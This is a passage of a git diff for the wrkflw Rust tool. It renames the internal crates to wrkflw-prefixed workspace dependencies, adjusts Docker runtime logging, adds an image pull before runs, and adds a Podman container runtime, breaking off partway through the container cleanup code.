 edition.workspace = true
-description = "Workflow executor for wrkflw"
+description = "Workflow execution engine for wrkflw"
 license.workspace = true
+documentation.workspace = true
+homepage.workspace = true
+repository.workspace = true
+keywords.workspace = true
+categories.workspace = true

 [dependencies]
 # Internal crates
-models = { path = "../models" }
-parser = { path = "../parser" }
-runtime = { path = "../runtime" }
-logging = { path = "../logging" }
-matrix = { path = "../matrix" }
-utils = { path = "../utils" }
+wrkflw-models.workspace = true
+wrkflw-parser.workspace = true
+wrkflw-runtime.workspace = true
+wrkflw-logging.workspace = true
+wrkflw-matrix.workspace = true
+wrkflw-secrets.workspace = true
+wrkflw-utils.workspace = true

 # External dependencies
 async-trait.workspace = true
@@ -21,6 +27,7 @@ chrono.workspace = true
 dirs.workspace = true
 futures.workspace = true
 futures-util.workspace = true
+ignore = "0.4"
 lazy_static.workspace = true
 num_cpus.workspace = true
 once_cell.workspace = true
29  crates/executor/README.md  (new file)

@@ -0,0 +1,29 @@
## wrkflw-executor

The execution engine that runs GitHub Actions workflows locally (Docker, Podman, or emulation).

- **Features**:
  - Job graph execution with `needs` ordering and parallelism
  - Docker/Podman container steps and emulation mode
  - Basic environment/context wiring compatible with Actions
- **Used by**: `wrkflw` CLI and TUI

### API sketch

```rust
use wrkflw_executor::{execute_workflow, ExecutionConfig, RuntimeType};

// Wrapped in an async main so the `.await` compiles; assumes the tokio
// runtime already used elsewhere in wrkflw.
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let cfg = ExecutionConfig {
        runtime: RuntimeType::Docker,
        verbose: true,
        preserve_containers_on_failure: false,
    };

    // Path to a workflow YAML
    let workflow_path = std::path::Path::new(".github/workflows/ci.yml");

    let result = execute_workflow(workflow_path, cfg).await?;
    println!("workflow status: {:?}", result.summary_status);
    Ok(())
}
```

Prefer using the `wrkflw` binary for a complete UX across validation, execution, and logs.
crates/executor/src/dependency.rs

@@ -1,5 +1,5 @@
-use parser::workflow::WorkflowDefinition;
 use std::collections::{HashMap, HashSet};
+use wrkflw_parser::workflow::WorkflowDefinition;

 pub fn resolve_dependencies(workflow: &WorkflowDefinition) -> Result<Vec<Vec<String>>, String> {
     let jobs = &workflow.jobs;
@@ -6,14 +6,14 @@ use bollard::{
|
||||
Docker,
|
||||
};
|
||||
use futures_util::StreamExt;
|
||||
use logging;
|
||||
use once_cell::sync::Lazy;
|
||||
use runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::sync::Mutex;
|
||||
use utils;
|
||||
use utils::fd;
|
||||
use wrkflw_logging;
|
||||
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use wrkflw_utils;
|
||||
use wrkflw_utils::fd;
|
||||
|
||||
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
static CREATED_NETWORKS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
@@ -50,7 +50,7 @@ impl DockerRuntime {
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
@@ -62,7 +62,7 @@ impl DockerRuntime {
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -72,7 +72,7 @@ impl DockerRuntime {
|
||||
let image_keys = match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(keys) => keys,
|
||||
Err(e) => {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
return None;
|
||||
}
|
||||
};
|
||||
@@ -107,7 +107,7 @@ impl DockerRuntime {
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
@@ -134,7 +134,7 @@ impl DockerRuntime {
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
@@ -318,7 +318,7 @@ pub fn is_available() -> bool {
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
logging::debug("Docker CLI is not available");
|
||||
wrkflw_logging::debug("Docker CLI is not available");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
@@ -331,7 +331,7 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(rt) => rt,
|
||||
Err(e) => {
|
||||
logging::error(&format!(
|
||||
wrkflw_logging::error(&format!(
|
||||
"Failed to create runtime for Docker availability check: {}",
|
||||
e
|
||||
));
|
||||
@@ -352,17 +352,25 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(Ok(_)) => true,
|
||||
Ok(Err(e)) => {
|
||||
logging::debug(&format!("Docker daemon ping failed: {}", e));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Docker daemon ping failed: {}",
|
||||
e
|
||||
));
|
||||
false
|
||||
}
|
||||
Err(_) => {
|
||||
logging::debug("Docker daemon ping timed out after 1 second");
|
||||
wrkflw_logging::debug(
|
||||
"Docker daemon ping timed out after 1 second",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
logging::debug(&format!("Docker daemon connection failed: {}", e));
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Docker daemon connection failed: {}",
|
||||
e
|
||||
));
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -371,7 +379,7 @@ pub fn is_available() -> bool {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Docker availability check timed out");
|
||||
wrkflw_logging::debug("Docker availability check timed out");
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -379,7 +387,9 @@ pub fn is_available() -> bool {
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::debug("Failed to redirect stderr when checking Docker availability");
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
@@ -393,7 +403,7 @@ pub fn is_available() -> bool {
|
||||
return match handle.join() {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::warning("Docker availability check thread panicked");
|
||||
wrkflw_logging::warning("Docker availability check thread panicked");
|
||||
false
|
||||
}
|
||||
};
|
||||
@@ -401,7 +411,9 @@ pub fn is_available() -> bool {
|
||||
std::thread::sleep(std::time::Duration::from_millis(50));
|
||||
}
|
||||
|
||||
logging::warning("Docker availability check timed out, assuming Docker is not available");
|
||||
wrkflw_logging::warning(
|
||||
"Docker availability check timed out, assuming Docker is not available",
|
||||
);
|
||||
false
|
||||
}
|
||||
|
||||
@@ -444,19 +456,19 @@ pub async fn cleanup_resources(docker: &Docker) {
|
||||
tokio::join!(cleanup_containers(docker), cleanup_networks(docker));
|
||||
|
||||
if let Err(e) = container_result {
|
||||
logging::error(&format!("Error during container cleanup: {}", e));
|
||||
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
|
||||
}
|
||||
|
||||
if let Err(e) = network_result {
|
||||
logging::error(&format!("Error during network cleanup: {}", e));
|
||||
wrkflw_logging::error(&format!("Error during network cleanup: {}", e));
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(_) => logging::debug("Docker cleanup completed within timeout"),
|
||||
Err(_) => {
|
||||
logging::warning("Docker cleanup timed out, some resources may not have been removed")
|
||||
}
|
||||
Ok(_) => wrkflw_logging::debug("Docker cleanup completed within timeout"),
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Docker cleanup timed out, some resources may not have been removed",
|
||||
),
|
||||
}
|
||||
}
|
||||
|
||||
@@ -468,7 +480,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
match RUNNING_CONTAINERS.try_lock() {
|
||||
Ok(containers) => containers.clone(),
|
||||
Err(_) => {
|
||||
logging::error("Could not acquire container lock for cleanup");
|
||||
wrkflw_logging::error("Could not acquire container lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -477,7 +489,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
{
|
||||
Ok(containers) => containers,
|
||||
Err(_) => {
|
||||
logging::error("Timeout while trying to get containers for cleanup");
|
||||
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
@@ -486,7 +498,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} containers",
|
||||
containers_to_cleanup.len()
|
||||
));
|
||||
@@ -500,11 +512,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::debug(&format!("Stopped container: {}", container_id)),
|
||||
Ok(Err(e)) => {
|
||||
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Stopped container: {}", container_id)),
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error stopping container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
|
||||
}
|
||||
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
|
||||
}
|
||||
|
||||
// Then try to remove it
|
||||
@@ -514,11 +529,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::debug(&format!("Removed container: {}", container_id)),
|
||||
Ok(Err(e)) => {
|
||||
logging::warning(&format!("Error removing container {}: {}", container_id, e))
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Removed container: {}", container_id)),
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error removing container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
|
||||
}
|
||||
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
|
||||
}
|
||||
|
||||
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
|
||||
@@ -536,7 +554,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
match CREATED_NETWORKS.try_lock() {
|
||||
Ok(networks) => networks.clone(),
|
||||
Err(_) => {
|
||||
logging::error("Could not acquire network lock for cleanup");
|
||||
wrkflw_logging::error("Could not acquire network lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
@@ -545,7 +563,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
{
|
||||
Ok(networks) => networks,
|
||||
Err(_) => {
|
||||
logging::error("Timeout while trying to get networks for cleanup");
|
||||
wrkflw_logging::error("Timeout while trying to get networks for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
@@ -554,7 +572,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} networks",
|
||||
networks_to_cleanup.len()
|
||||
));
|
||||
@@ -566,9 +584,13 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(Ok(_)) => logging::info(&format!("Successfully removed network: {}", network_id)),
|
||||
Ok(Err(e)) => logging::error(&format!("Error removing network {}: {}", network_id, e)),
|
||||
Err(_) => logging::warning(&format!("Timeout removing network: {}", network_id)),
|
||||
Ok(Ok(_)) => {
|
||||
wrkflw_logging::info(&format!("Successfully removed network: {}", network_id))
|
||||
}
|
||||
Ok(Err(e)) => {
|
||||
wrkflw_logging::error(&format!("Error removing network {}: {}", network_id, e))
|
||||
}
|
||||
Err(_) => wrkflw_logging::warning(&format!("Timeout removing network: {}", network_id)),
|
||||
}
|
||||
|
||||
// Always untrack the network whether or not we succeeded
|
||||
@@ -599,7 +621,7 @@ pub async fn create_job_network(docker: &Docker) -> Result<String, ContainerErro
|
||||
})?;
|
||||
|
||||
track_network(&network_id);
|
||||
logging::info(&format!("Created Docker network: {}", network_id));
|
||||
wrkflw_logging::info(&format!("Created Docker network: {}", network_id));
|
||||
|
||||
Ok(network_id)
|
||||
}
|
||||
@@ -615,7 +637,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// Print detailed debugging info
|
||||
logging::info(&format!("Docker: Running container with image: {}", image));
|
||||
wrkflw_logging::info(&format!("Docker: Running container with image: {}", image));
|
||||
|
||||
// Add a global timeout for all Docker operations to prevent freezing
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // Increased outer timeout to 6 minutes
|
||||
@@ -629,7 +651,7 @@ impl ContainerRuntime for DockerRuntime {
         {
             Ok(result) => result,
             Err(_) => {
-                logging::error("Docker operation timed out after 360 seconds");
+                wrkflw_logging::error("Docker operation timed out after 360 seconds");
                 Err(ContainerError::ContainerExecution(
                     "Operation timed out".to_string(),
                 ))
@@ -644,7 +666,7 @@ impl ContainerRuntime for DockerRuntime {
         match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
             Ok(result) => result,
             Err(_) => {
-                logging::warning(&format!(
+                wrkflw_logging::warning(&format!(
                     "Pull of image {} timed out, continuing with existing image",
                     image
                 ));
@@ -662,7 +684,7 @@ impl ContainerRuntime for DockerRuntime {
         {
             Ok(result) => result,
             Err(_) => {
-                logging::error(&format!(
+                wrkflw_logging::error(&format!(
                     "Building image {} timed out after 120 seconds",
                     tag
                 ));
@@ -818,6 +840,14 @@ impl DockerRuntime {
         working_dir: &Path,
         volumes: &[(&Path, &Path)],
     ) -> Result<ContainerOutput, ContainerError> {
+        // First, try to pull the image if it's not available locally
+        if let Err(e) = self.pull_image_inner(image).await {
+            wrkflw_logging::warning(&format!(
+                "Failed to pull image {}: {}. Attempting to continue with existing image.",
+                image, e
+            ));
+        }
+
         // Collect environment variables
         let mut env: Vec<String> = env_vars
             .iter()
@@ -836,9 +866,9 @@ impl DockerRuntime {
         // Convert command vector to Vec<String>
         let cmd_vec: Vec<String> = cmd.iter().map(|&s| s.to_string()).collect();

-        logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
-        logging::debug(&format!("Environment: {:?}", env));
-        logging::debug(&format!("Working directory: {}", working_dir.display()));
+        wrkflw_logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
+        wrkflw_logging::debug(&format!("Environment: {:?}", env));
+        wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));

         // Determine platform-specific configurations
         let is_windows_image = image.contains("windows")
@@ -973,7 +1003,7 @@ impl DockerRuntime {
                 _ => -1,
             },
             Err(_) => {
-                logging::warning("Container wait operation timed out, treating as failure");
+                wrkflw_logging::warning("Container wait operation timed out, treating as failure");
                 -1
             }
         };
@@ -1003,7 +1033,7 @@ impl DockerRuntime {
                 }
             }
         } else {
-            logging::warning("Retrieving container logs timed out");
+            wrkflw_logging::warning("Retrieving container logs timed out");
         }

         // Clean up container with a timeout, but preserve on failure if configured
@@ -1016,7 +1046,7 @@ impl DockerRuntime {
             untrack_container(&container.id);
         } else {
             // Container failed and we want to preserve it for debugging
-            logging::info(&format!(
+            wrkflw_logging::info(&format!(
                 "Preserving container {} for debugging (exit code: {}). Use 'docker exec -it {} bash' to inspect.",
                 container.id, exit_code, container.id
             ));
@@ -1026,13 +1056,13 @@ impl DockerRuntime {

         // Log detailed information about the command execution for debugging
         if exit_code != 0 {
-            logging::info(&format!(
+            wrkflw_logging::info(&format!(
                 "Docker command failed with exit code: {}",
                 exit_code
             ));
-            logging::debug(&format!("Failed command: {:?}", cmd));
-            logging::debug(&format!("Working directory: {}", working_dir.display()));
-            logging::debug(&format!("STDERR: {}", stderr));
+            wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
+            wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
+            wrkflw_logging::debug(&format!("STDERR: {}", stderr));
         }

         Ok(ContainerOutput {
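All three timeout hunks above instantiate the same pattern: wrap the inner async operation in `tokio::time::timeout` and map the elapsed case onto a `ContainerError`. A minimal sketch of that pattern as a reusable helper follows; `with_timeout` is illustrative and not part of the crate, while `ContainerError` and `wrkflw_logging::error` are the items the diff itself uses:

```rust
use std::future::Future;
use std::time::Duration;
use wrkflw_runtime::container::ContainerError;

// Sketch only: the timeout-wrapping pattern repeated in the hunks above.
async fn with_timeout<T, F>(op: F, secs: u64, what: &str) -> Result<T, ContainerError>
where
    F: Future<Output = Result<T, ContainerError>>,
{
    match tokio::time::timeout(Duration::from_secs(secs), op).await {
        // The inner future finished in time; propagate its own Ok/Err
        Ok(result) => result,
        // The timer fired first: log and map to the error shape used above
        Err(_) => {
            wrkflw_logging::error(&format!("{} timed out after {} seconds", what, secs));
            Err(ContainerError::ContainerExecution(
                "Operation timed out".to_string(),
            ))
        }
    }
}
```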
File diff suppressed because it is too large
@@ -1,8 +1,8 @@
 use chrono::Utc;
-use matrix::MatrixCombination;
-use parser::workflow::WorkflowDefinition;
 use serde_yaml::Value;
 use std::{collections::HashMap, fs, io, path::Path};
+use wrkflw_matrix::MatrixCombination;
+use wrkflw_parser::workflow::WorkflowDefinition;

 pub fn setup_github_environment_files(workspace_dir: &Path) -> io::Result<()> {
     // Create necessary directories
@@ -6,6 +6,7 @@ pub mod dependency;
 pub mod docker;
 pub mod engine;
 pub mod environment;
+pub mod podman;
 pub mod substitution;

 // Re-export public items
877
crates/executor/src/podman.rs
Normal file
@@ -0,0 +1,877 @@
use async_trait::async_trait;
use once_cell::sync::Lazy;
use std::collections::HashMap;
use std::path::Path;
use std::process::Stdio;
use std::sync::Mutex;
use tempfile;
use tokio::process::Command;
use wrkflw_logging;
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use wrkflw_utils;
use wrkflw_utils::fd;

static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
// Map to track customized images for a job
#[allow(dead_code)]
static CUSTOMIZED_IMAGES: Lazy<Mutex<HashMap<String, String>>> =
    Lazy::new(|| Mutex::new(HashMap::new()));

pub struct PodmanRuntime {
    preserve_containers_on_failure: bool,
}

impl PodmanRuntime {
    pub fn new() -> Result<Self, ContainerError> {
        Self::new_with_config(false)
    }

    pub fn new_with_config(preserve_containers_on_failure: bool) -> Result<Self, ContainerError> {
        // Check if podman command is available
        if !is_available() {
            return Err(ContainerError::ContainerStart(
                "Podman is not available on this system".to_string(),
            ));
        }

        Ok(PodmanRuntime {
            preserve_containers_on_failure,
        })
    }

    // Add a method to store and retrieve customized images (e.g., with Python installed)
    #[allow(dead_code)]
    pub fn get_customized_image(base_image: &str, customization: &str) -> Option<String> {
        let key = format!("{}:{}", base_image, customization);
        match CUSTOMIZED_IMAGES.lock() {
            Ok(images) => images.get(&key).cloned(),
            Err(e) => {
                wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
                None
            }
        }
    }

    #[allow(dead_code)]
    pub fn set_customized_image(base_image: &str, customization: &str, new_image: &str) {
        let key = format!("{}:{}", base_image, customization);
        if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
            images.insert(key, new_image.to_string());
        }) {
            wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
        }
    }

    /// Find a customized image key by prefix
    #[allow(dead_code)]
    pub fn find_customized_image_key(image: &str, prefix: &str) -> Option<String> {
        let image_keys = match CUSTOMIZED_IMAGES.lock() {
            Ok(keys) => keys,
            Err(e) => {
                wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
                return None;
            }
        };

        // Look for any key that starts with the prefix
        for (key, _) in image_keys.iter() {
            if key.starts_with(prefix) {
                return Some(key.clone());
            }
        }

        None
    }

    /// Get a customized image with language-specific dependencies
    pub fn get_language_specific_image(
        base_image: &str,
        language: &str,
        version: Option<&str>,
    ) -> Option<String> {
        let key = match (language, version) {
            ("python", Some(ver)) => format!("python:{}", ver),
            ("node", Some(ver)) => format!("node:{}", ver),
            ("java", Some(ver)) => format!("eclipse-temurin:{}", ver),
            ("go", Some(ver)) => format!("golang:{}", ver),
            ("dotnet", Some(ver)) => format!("mcr.microsoft.com/dotnet/sdk:{}", ver),
            ("rust", Some(ver)) => format!("rust:{}", ver),
            (lang, Some(ver)) => format!("{}:{}", lang, ver),
            (lang, None) => lang.to_string(),
        };

        match CUSTOMIZED_IMAGES.lock() {
            Ok(images) => images.get(&key).cloned(),
            Err(e) => {
                wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
                None
            }
        }
    }

    /// Set a customized image with language-specific dependencies
    pub fn set_language_specific_image(
        base_image: &str,
        language: &str,
        version: Option<&str>,
        new_image: &str,
    ) {
        let key = match (language, version) {
            ("python", Some(ver)) => format!("python:{}", ver),
            ("node", Some(ver)) => format!("node:{}", ver),
            ("java", Some(ver)) => format!("eclipse-temurin:{}", ver),
            ("go", Some(ver)) => format!("golang:{}", ver),
            ("dotnet", Some(ver)) => format!("mcr.microsoft.com/dotnet/sdk:{}", ver),
            ("rust", Some(ver)) => format!("rust:{}", ver),
            (lang, Some(ver)) => format!("{}:{}", lang, ver),
            (lang, None) => lang.to_string(),
        };

        if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
            images.insert(key, new_image.to_string());
        }) {
            wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
        }
    }

    /// Execute a podman command with proper error handling and timeout
    async fn execute_podman_command(
        &self,
        args: &[&str],
        input: Option<&str>,
    ) -> Result<ContainerOutput, ContainerError> {
        let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout

        let result = tokio::time::timeout(timeout_duration, async {
            let mut cmd = Command::new("podman");
            cmd.args(args);

            if input.is_some() {
                cmd.stdin(Stdio::piped());
            }
            cmd.stdout(Stdio::piped()).stderr(Stdio::piped());

            wrkflw_logging::debug(&format!(
                "Running Podman command: podman {}",
                args.join(" ")
            ));

            let mut child = cmd.spawn().map_err(|e| {
                ContainerError::ContainerStart(format!("Failed to spawn podman command: {}", e))
            })?;

            // Send input if provided
            if let Some(input_data) = input {
                if let Some(stdin) = child.stdin.take() {
                    use tokio::io::AsyncWriteExt;
                    let mut stdin = stdin;
                    stdin.write_all(input_data.as_bytes()).await.map_err(|e| {
                        ContainerError::ContainerExecution(format!(
                            "Failed to write to stdin: {}",
                            e
                        ))
                    })?;
                    stdin.shutdown().await.map_err(|e| {
                        ContainerError::ContainerExecution(format!("Failed to close stdin: {}", e))
                    })?;
                }
            }

            let output = child.wait_with_output().await.map_err(|e| {
                ContainerError::ContainerExecution(format!("Podman command failed: {}", e))
            })?;

            Ok(ContainerOutput {
                stdout: String::from_utf8_lossy(&output.stdout).to_string(),
                stderr: String::from_utf8_lossy(&output.stderr).to_string(),
                exit_code: output.status.code().unwrap_or(-1),
            })
        })
        .await;

        match result {
            Ok(output) => output,
            Err(_) => {
                wrkflw_logging::error("Podman operation timed out after 360 seconds");
                Err(ContainerError::ContainerExecution(
                    "Operation timed out".to_string(),
                ))
            }
        }
    }
}

pub fn is_available() -> bool {
    // Use a very short timeout for the entire availability check
    let overall_timeout = std::time::Duration::from_secs(3);

    // Spawn a thread with the timeout to prevent blocking the main thread
    let handle = std::thread::spawn(move || {
        // Use safe FD redirection utility to suppress Podman error messages
        match fd::with_stderr_to_null(|| {
            // First, check if podman CLI is available as a quick test
            if cfg!(target_os = "linux") || cfg!(target_os = "macos") {
                // Try a simple podman version command with a short timeout
                let process = std::process::Command::new("podman")
                    .arg("version")
                    .arg("--format")
                    .arg("{{.Version}}")
                    .stdout(std::process::Stdio::null())
                    .stderr(std::process::Stdio::null())
                    .spawn();

                match process {
                    Ok(mut child) => {
                        // Set a very short timeout for the process
                        let status = std::thread::scope(|_| {
                            // Try to wait for a short time
                            for _ in 0..10 {
                                match child.try_wait() {
                                    Ok(Some(status)) => return status.success(),
                                    Ok(None) => {
                                        std::thread::sleep(std::time::Duration::from_millis(100))
                                    }
                                    Err(_) => return false,
                                }
                            }
                            // Kill it if it takes too long
                            let _ = child.kill();
                            false
                        });

                        if !status {
                            return false;
                        }
                    }
                    Err(_) => {
                        wrkflw_logging::debug("Podman CLI is not available");
                        return false;
                    }
                }
            }

            // Try to run a simple podman command to check if the daemon is responsive
            let runtime = match tokio::runtime::Builder::new_current_thread()
                .enable_all()
                .build()
            {
                Ok(rt) => rt,
                Err(e) => {
                    wrkflw_logging::error(&format!(
                        "Failed to create runtime for Podman availability check: {}",
                        e
                    ));
                    return false;
                }
            };

            runtime.block_on(async {
                match tokio::time::timeout(std::time::Duration::from_secs(2), async {
                    let mut cmd = Command::new("podman");
                    cmd.args(["info", "--format", "{{.Host.Hostname}}"]);
                    cmd.stdout(Stdio::null()).stderr(Stdio::null());

                    match tokio::time::timeout(std::time::Duration::from_secs(1), cmd.output())
                        .await
                    {
                        Ok(Ok(output)) => {
                            if output.status.success() {
                                true
                            } else {
                                wrkflw_logging::debug("Podman info command failed");
                                false
                            }
                        }
                        Ok(Err(e)) => {
                            wrkflw_logging::debug(&format!("Podman info command error: {}", e));
                            false
                        }
                        Err(_) => {
                            wrkflw_logging::debug("Podman info command timed out after 1 second");
                            false
                        }
                    }
                })
                .await
                {
                    Ok(result) => result,
                    Err(_) => {
                        wrkflw_logging::debug("Podman availability check timed out");
                        false
                    }
                }
            })
        }) {
            Ok(result) => result,
            Err(_) => {
                wrkflw_logging::debug(
                    "Failed to redirect stderr when checking Podman availability",
                );
                false
            }
        }
    });

    // Manual implementation of join with timeout
    let start = std::time::Instant::now();

    while start.elapsed() < overall_timeout {
        if handle.is_finished() {
            return match handle.join() {
                Ok(result) => result,
                Err(_) => {
                    wrkflw_logging::warning("Podman availability check thread panicked");
                    false
                }
            };
        }
        std::thread::sleep(std::time::Duration::from_millis(50));
    }

    wrkflw_logging::warning(
        "Podman availability check timed out, assuming Podman is not available",
    );
    false
}

// Add container to tracking
pub fn track_container(id: &str) {
    if let Ok(mut containers) = RUNNING_CONTAINERS.lock() {
        containers.push(id.to_string());
    }
}

// Remove container from tracking
pub fn untrack_container(id: &str) {
    if let Ok(mut containers) = RUNNING_CONTAINERS.lock() {
        containers.retain(|c| c != id);
    }
}

// Clean up all tracked resources
pub async fn cleanup_resources() {
    // Use a global timeout for the entire cleanup process
    let cleanup_timeout = std::time::Duration::from_secs(5);

    match tokio::time::timeout(cleanup_timeout, cleanup_containers()).await {
        Ok(result) => {
            if let Err(e) = result {
                wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
            }
        }
        Err(_) => wrkflw_logging::warning(
            "Podman cleanup timed out, some resources may not have been removed",
        ),
    }
}

// Clean up all tracked containers
pub async fn cleanup_containers() -> Result<(), String> {
    // Getting the containers to clean up should not take a long time
    let containers_to_cleanup =
        match tokio::time::timeout(std::time::Duration::from_millis(500), async {
            match RUNNING_CONTAINERS.try_lock() {
                Ok(containers) => containers.clone(),
                Err(_) => {
                    wrkflw_logging::error("Could not acquire container lock for cleanup");
                    vec![]
                }
            }
        })
        .await
        {
            Ok(containers) => containers,
            Err(_) => {
                wrkflw_logging::error("Timeout while trying to get containers for cleanup");
                vec![]
            }
        };

    if containers_to_cleanup.is_empty() {
        return Ok(());
    }

    wrkflw_logging::info(&format!(
        "Cleaning up {} containers",
        containers_to_cleanup.len()
    ));

    // Process each container with a timeout
    for container_id in containers_to_cleanup {
        // First try to stop the container
        let stop_result = tokio::time::timeout(
            std::time::Duration::from_millis(1000),
            Command::new("podman")
                .args(["stop", &container_id])
                .stdout(Stdio::null())
                .stderr(Stdio::null())
                .output(),
        )
        .await;

        match stop_result {
            Ok(Ok(output)) => {
                if output.status.success() {
                    wrkflw_logging::debug(&format!("Stopped container: {}", container_id));
                } else {
                    wrkflw_logging::warning(&format!("Error stopping container {}", container_id));
                }
            }
            Ok(Err(e)) => wrkflw_logging::warning(&format!(
                "Error stopping container {}: {}",
                container_id, e
            )),
            Err(_) => {
                wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
            }
        }

        // Then try to remove it
        let remove_result = tokio::time::timeout(
            std::time::Duration::from_millis(1000),
            Command::new("podman")
                .args(["rm", &container_id])
                .stdout(Stdio::null())
                .stderr(Stdio::null())
                .output(),
        )
        .await;

        match remove_result {
            Ok(Ok(output)) => {
                if output.status.success() {
                    wrkflw_logging::debug(&format!("Removed container: {}", container_id));
                } else {
                    wrkflw_logging::warning(&format!("Error removing container {}", container_id));
                }
            }
